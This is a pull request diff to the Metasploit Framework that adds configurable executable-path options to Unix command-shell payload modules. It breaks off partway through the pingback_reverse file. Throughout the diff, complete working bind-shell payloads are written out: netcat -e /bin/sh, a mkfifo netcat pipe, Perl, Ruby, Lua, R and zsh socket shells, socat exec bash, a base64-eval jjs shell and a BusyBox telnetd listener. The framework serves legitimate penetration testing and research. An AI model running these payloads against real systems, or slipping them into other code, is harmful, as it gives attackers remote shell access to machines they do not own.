### PR TITLE
Add executable path for command payloads

### DIFF
--- a/documentation/modules/payload/cmd/unix/bind_busybox_telnetd.md
+++ b/documentation/modules/payload/cmd/unix/bind_busybox_telnetd.md
@@ -13,6 +13,9 @@ with BusyBox telnetd installed.
   The command telnetd will execute on connect. The default value is `/bin/sh`
   in order to provide a command shell.
 
+  **TelnetdPath**
+  The path to the telnetd executable on disk. The default value is `telnetd`.
+
 ### Advanced
 
   **CommandShellCleanupCommand**

--- a/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb
+++ b/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb
@@ -13,21 +13,21 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via BusyBox telnetd)',
-      'Description'   => 'Listen for a connection and spawn a command shell via BusyBox telnetd',
-      'Author'        => 'Matthew Kienow <matthew_kienow[AT]rapid7.com>',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'telnetd',
-      'Payload'       => {
-        'Offsets' => { },
-        'Payload' => ''
-      }
-    ))
+     'Name'          => 'Unix Command Shell, Bind TCP (via BusyBox telnetd)',
+     'Description'   => 'Listen for a connection and spawn a command shell via BusyBox telnetd',
+     'Author'        => 'Matthew Kienow <matthew_kienow[AT]rapid7.com>',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'telnetd',
+     'Payload'       => {
+       'Offsets' => { },
+       'Payload' => ''
+     }
+   ))
 
     register_options(
       [
@@ -37,7 +37,8 @@ module MetasploitModule
 
     register_advanced_options(
       [
-        OptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'pkill telnetd'])
+        OptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'pkill telnetd']),
+        OptString.new('TelnetdPath', [true, 'The path to the telnetd executable', 'telnetd'])
       ]
     )
   end
@@ -54,7 +55,7 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "telnetd -l #{datastore['LOGIN_CMD']} -p #{datastore['LPORT']}"
+    "#{datastore['TelnetdPath']} -l #{datastore['LOGIN_CMD']} -p #{datastore['LPORT']}"
   end
 
 end

--- a/modules/payloads/singles/cmd/unix/bind_jjs.rb
+++ b/modules/payloads/singles/cmd/unix/bind_jjs.rb
@@ -13,29 +13,36 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Bind TCP (via jjs)',
-      'Description' => 'Listen for a connection and spawn a command shell via jjs',
-      'Author'      => [
-        'conerpirate', # jjs bind shell
-        'bcoles'       # metasploit
-      ],
-      'References'    => [
-        ['URL', 'https://gtfobins.github.io/gtfobins/jjs/'],
-        ['URL', 'https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/'],
-        ['URL', 'https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html'],
-      ],
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::BindTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'jjs',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Name'        => 'Unix Command Shell, Bind TCP (via jjs)',
+     'Description' => 'Listen for a connection and spawn a command shell via jjs',
+     'Author'      => [
+       'conerpirate', # jjs bind shell
+       'bcoles'       # metasploit
+     ],
+     'References'    => [
+       ['URL', 'https://gtfobins.github.io/gtfobins/jjs/'],
+       ['URL', 'https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/'],
+       ['URL', 'https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html'],
+     ],
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::BindTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'jjs',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
     ))
-    register_options [
-      OptString.new('SHELL', [ true, 'The shell to execute.', '/bin/sh' ])
-    ]
+    register_options(
+      [
+        OptString.new('SHELL', [ true, 'The shell to execute', '/bin/sh' ])
+      ]
+    )
+    register_advanced_options(
+      [
+        OptString.new('JJSPath', [true, 'The path to the JJS executable', 'jjs'])
+      ]
+    )
   end
 
   def generate(_opts = {})
@@ -65,6 +72,6 @@ module MetasploitModule
 
     minified = jcode.split("\n").map(&:lstrip).join
 
-    %Q{echo "eval(new java.lang.String(java.util.Base64.decoder.decode('#{Rex::Text.encode_base64(minified)}')));"|jjs}
+    %Q{echo "eval(new java.lang.String(java.util.Base64.decoder.decode('#{Rex::Text.encode_base64(minified)}')));"|#{datastore['JJSPath']}}
   end
 end

--- a/modules/payloads/singles/cmd/unix/bind_lua.rb
+++ b/modules/payloads/singles/cmd/unix/bind_lua.rb
@@ -13,25 +13,30 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via Lua)',
-      'Description'   => 'Listen for a connection and spawn a command shell via Lua',
-      'Author'        =>
-        [
-          'xistence <xistence[at]0x90.nl>',
-        ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'lua',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Bind TCP (via Lua)',
+     'Description'   => 'Listen for a connection and spawn a command shell via Lua',
+     'Author'        =>
+       [
+         'xistence <xistence[at]0x90.nl>',
+       ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'lua',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('LuaPath', [true, 'The path to the Lua executable', 'lua'])
+      ]
+    )
   end
 
   #
@@ -46,7 +51,7 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "lua -e \"local s=require('socket');local s=assert(s.bind('*',#{datastore['LPORT']}));local c=s:accept();while true do local r,x=c:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));c:send(b);end;c:close();f:close();\""
+    "#{datastore['LuaPath']} -e \"local s=require('socket');local s=assert(s.bind('*',#{datastore['LPORT']}));local c=s:accept();while true do local r,x=c:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));c:send(b);end;c:close();f:close();\""
   end
 end
 

--- a/modules/payloads/singles/cmd/unix/bind_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb
@@ -13,27 +13,33 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via netcat)',
-      'Description'   => 'Listen for a connection and spawn a command shell via netcat',
-      'Author'         =>
-        [
-          'm-1-k-3',
-          'egypt',
-          'juan vazquez'
-        ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'netcat',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Bind TCP (via netcat)',
+     'Description'   => 'Listen for a connection and spawn a command shell via netcat',
+     'Author'         =>
+       [
+         'm-1-k-3',
+         'egypt',
+         'juan vazquez'
+       ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'netcat',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])
+      ]
+    )
   end
 
   #
@@ -49,6 +55,6 @@ module MetasploitModule
   #
   def command_string
     backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
-    "mkfifo /tmp/#{backpipe}; (nc -l -p #{datastore['LPORT']} ||nc -l #{datastore['LPORT']})0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
+    "mkfifo /tmp/#{backpipe}; (#{datastore['NetcatPath']} -l -p #{datastore['LPORT']} ||#{datastore['NetcatPath']} -l #{datastore['LPORT']})0</tmp/#{backpipe} | #{datastore['ShellPath']} >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
   end
 end

--- a/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb
@@ -13,22 +13,28 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via netcat -e)',
-      'Description'   => 'Listen for a connection and spawn a command shell via netcat',
-      'Author'        => 'hdm',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'netcat-e',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Bind TCP (via netcat -e)',
+     'Description'   => 'Listen for a connection and spawn a command shell via netcat',
+     'Author'        => 'hdm',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'netcat-e',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])
+      ]
+    )
   end
 
   #
@@ -43,6 +49,6 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "nc -l -p #{datastore['LPORT']} -e /bin/sh"
+    "#{datastore['NetcatPath']} -l -p #{datastore['LPORT']} -e #{datastore['ShellPath']}"
   end
 end

--- a/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb
@@ -13,22 +13,28 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via netcat -e) IPv6',
-      'Description'   => 'Listen for a connection and spawn a command shell via netcat',
-      'Author'        => 'hdm',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'netcat-e',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Bind TCP (via netcat -e) IPv6',
+     'Description'   => 'Listen for a connection and spawn a command shell via netcat',
+     'Author'        => 'hdm',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'netcat-e',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])
+      ]
+    )
   end
 
   #
@@ -43,6 +49,6 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "nc -6 -lp #{datastore['LPORT']} -e /bin/sh"
+    "#{datastore['NetcatPath']} -6 -lp #{datastore['LPORT']} -e #{datastore['ShellPath']}"
   end
 end

--- a/modules/payloads/singles/cmd/unix/bind_perl.rb
+++ b/modules/payloads/singles/cmd/unix/bind_perl.rb
@@ -13,22 +13,27 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via Perl)',
-      'Description'   => 'Listen for a connection and spawn a command shell via perl',
-      'Author'        => ['Samy <samy[at]samy.pl>', 'cazz'],
-      'License'       => BSD_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'perl',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Bind TCP (via Perl)',
+     'Description'   => 'Listen for a connection and spawn a command shell via perl',
+     'Author'        => ['Samy <samy[at]samy.pl>', 'cazz'],
+     'License'       => BSD_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'perl',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('PerlPath', [true, 'The path to the Perl executable', 'perl'])
+      ]
+    )
   end
 
   #
@@ -43,7 +48,7 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-     cmd = "perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'"
+    cmd = "#{datastore['PerlPath']} -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'"
     return cmd
   end
 end

--- a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb
+++ b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb
@@ -13,22 +13,27 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via perl) IPv6',
-      'Description'   => 'Listen for a connection and spawn a command shell via perl',
-      'Author'        => ['Samy <samy[at]samy.pl>', 'cazz'],
-      'License'       => BSD_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'perl',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Bind TCP (via perl) IPv6',
+     'Description'   => 'Listen for a connection and spawn a command shell via perl',
+     'Author'        => ['Samy <samy[at]samy.pl>', 'cazz'],
+     'License'       => BSD_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'perl',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('PerlPath', [true, 'The path to the Perl executable', 'perl'])
+      ]
+    )
   end
 
   #
@@ -44,7 +49,7 @@ module MetasploitModule
   #
   def command_string
 
-    cmd = "perl -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET6(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'"
+    cmd = "#{datastore['PerlPath']} -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET6(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'"
 
     return cmd
   end

--- a/modules/payloads/singles/cmd/unix/bind_r.rb
+++ b/modules/payloads/singles/cmd/unix/bind_r.rb
@@ -14,18 +14,23 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Bind TCP (via R)',
-      'Description' => 'Continually listen for a connection and spawn a command shell via R',
-      'Author'      => [ 'RageLtMan <rageltman[at]sempervictus>' ],
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::BindTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'R',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
-    ))
+     'Name'        => 'Unix Command Shell, Bind TCP (via R)',
+     'Description' => 'Continually listen for a connection and spawn a command shell via R',
+     'Author'      => [ 'RageLtMan <rageltman[at]sempervictus>' ],
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::BindTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'R',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+          ))
+    register_advanced_options(
+      [
+        OptString.new('RPath', [true, 'The path to the R executable', 'R'])
+      ]
+    )
   end
 
   def generate(_opts = {})
@@ -33,12 +38,12 @@ module MetasploitModule
   end
 
   def prepends(r_string)
-   return "R -e \"#{r_string}\""
+    return "#{datastore['RPath']} -e \"#{r_string}\""
   end
 
   def r_string
     return "s<-socketConnection(port=#{datastore['LPORT']}," +
-    "blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +
-    "(pipe(readLines(s,1))),s)}"
+      "blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +
+      "(pipe(readLines(s,1))),s)}"
   end
 end

--- a/modules/payloads/singles/cmd/unix/bind_ruby.rb
+++ b/modules/payloads/singles/cmd/unix/bind_ruby.rb
@@ -13,18 +13,23 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Bind TCP (via Ruby)',
-      'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
-      'Author'      => 'kris katterjohn',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::BindTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'ruby',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Name'        => 'Unix Command Shell, Bind TCP (via Ruby)',
+     'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
+     'Author'      => 'kris katterjohn',
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::BindTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'ruby',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
     ))
+    register_advanced_options(
+      [
+        OptString.new('RubyPath', [true, 'The path to the Ruby executable', 'ruby'])
+      ]
+    )
   end
 
   def generate(_opts = {})
@@ -33,6 +38,6 @@ module MetasploitModule
   end
 
   def command_string
-    "ruby -rsocket -e 'exit if fork;s=TCPServer.new(\"#{datastore['LPORT']}\");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end;end'"
+    "#{datastore['RubyPath']} -rsocket -e 'exit if fork;s=TCPServer.new(\"#{datastore['LPORT']}\");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end;end'"
   end
 end

--- a/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb
+++ b/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb
@@ -13,18 +13,23 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Bind TCP (via Ruby) IPv6',
-      'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
-      'Author'      => 'kris katterjohn',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::BindTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'ruby',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Name'        => 'Unix Command Shell, Bind TCP (via Ruby) IPv6',
+     'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
+     'Author'      => 'kris katterjohn',
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::BindTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'ruby',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
     ))
+    register_advanced_options(
+      [
+        OptString.new('RubyPath', [true, 'The path to the Ruby executable', 'ruby'])
+      ]
+    )
   end
 
   def generate(_opts = {})
@@ -33,6 +38,6 @@ module MetasploitModule
   end
 
   def command_string
-    "ruby -rsocket -e 'exit if fork;s=TCPServer.new(\"::\",\"#{datastore['LPORT']}\");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end;end'"
+    "#{datastore['RubyPath']} -rsocket -e 'exit if fork;s=TCPServer.new(\"::\",\"#{datastore['LPORT']}\");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end;end'"
   end
 end

--- a/modules/payloads/singles/cmd/unix/bind_socat_udp.rb
+++ b/modules/payloads/singles/cmd/unix/bind_socat_udp.rb
@@ -13,22 +13,28 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind UDP (via socat)',
-      'Description'   => 'Creates an interactive shell via socat',
-      'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindUdp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'socat',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Bind UDP (via socat)',
+     'Description'   => 'Creates an interactive shell via socat',
+     'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindUdp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'socat',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+          ))
+    register_advanced_options(
+      [
+        OptString.new('SocatPath', [true, 'The path to the Socat executable', 'socat']),
+        OptString.new('BashPath', [true, 'The path to the Bash executable', 'bash'])
+      ]
+    )
   end
 
   #
@@ -43,7 +49,7 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "socat udp-listen:#{datastore['LPORT']} exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &"
+    "#{datastore['SocatPath']} udp-listen:#{datastore['LPORT']} exec:'#{datastore['BashPath']} -li',pty,stderr,sane 2>&1>/dev/null &"
   end
 
 end

--- a/modules/payloads/singles/cmd/unix/bind_zsh.rb
+++ b/modules/payloads/singles/cmd/unix/bind_zsh.rb
@@ -13,29 +13,34 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via Zsh)',
-      'Description'   => %q{
+     'Name'          => 'Unix Command Shell, Bind TCP (via Zsh)',
+     'Description'   => %q{
         Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is
         often available, please be aware it isn't usually installed by default.
       },
-      'Author'        =>
-        [
-          'Doug Prostko <dougtko[at]gmail.com>',    # Initial payload
-          'Wang Yihang <wangyihanger[at]gmail.com>' # Simplified redirections
-        ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'zsh',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Author'        =>
+       [
+         'Doug Prostko <dougtko[at]gmail.com>',    # Initial payload
+         'Wang Yihang <wangyihanger[at]gmail.com>' # Simplified redirections
+       ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'zsh',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('ZSHPath', [true, 'The path to the ZSH executable', 'zsh'])
+      ]
+    )
   end
 
   #
@@ -49,6 +54,6 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "zsh -c 'zmodload zsh/net/tcp && ztcp -l #{datastore['LPORT']} && ztcp -a $REPLY && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'"
+    "#{datastore['ZSHPath']} -c 'zmodload zsh/net/tcp && ztcp -l #{datastore['LPORT']} && ztcp -a $REPLY && #{datastore['ZSHPath']} >&$REPLY 2>&$REPLY 0>&$REPLY'"
   end
 end

--- a/modules/payloads/singles/cmd/unix/pingback_bind.rb
+++ b/modules/payloads/singles/cmd/unix/pingback_bind.rb
@@ -14,20 +14,25 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Pingback Bind TCP (via netcat)',
-      'Description'   => 'Accept a connection, send a UUID, then exit',
-      'Author'        =>
-        [
-          'asoto-r7'
-        ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::Pingback,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'netcat'
+     'Name'          => 'Unix Command Shell, Pingback Bind TCP (via netcat)',
+     'Description'   => 'Accept a connection, send a UUID, then exit',
+     'Author'        =>
+       [
+         'asoto-r7'
+       ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::Pingback,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'netcat'
     ))
+    register_advanced_options(
+      [
+        OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc'])
+      ]
+    )
   end
 
   #
@@ -42,6 +47,6 @@ module MetasploitModule
   #
   def command_string
     self.pingback_uuid ||= self.generate_pingback_uuid
-    "printf '#{pingback_uuid.scan(/../).map { |x| "\\x" + x }.join}' | (nc -lp #{datastore['LPORT']} || nc -l #{datastore['LPORT']})"
+    "printf '#{pingback_uuid.scan(/../).map { |x| "\\x" + x }.join}' | (#{datastore['NetcatPath']} -lp #{datastore['LPORT']} || #{datastore['NetcatPath']} -l #{datastore['LPORT']})"
   end
 end

--- a/modules/payloads/singles/cmd/unix/pingback_reverse.rb
+++ b/modules/payloads/singles/cmd/unix/pingback_reverse.rb
@@ -14,20 +14,25 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Pingback Reverse TCP (via netcat)',
-      'Description'   => 'Creates a socket, send a UUID, then exit',
-      'Author'        =>
-        [
-          'asoto-r7'
-        ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
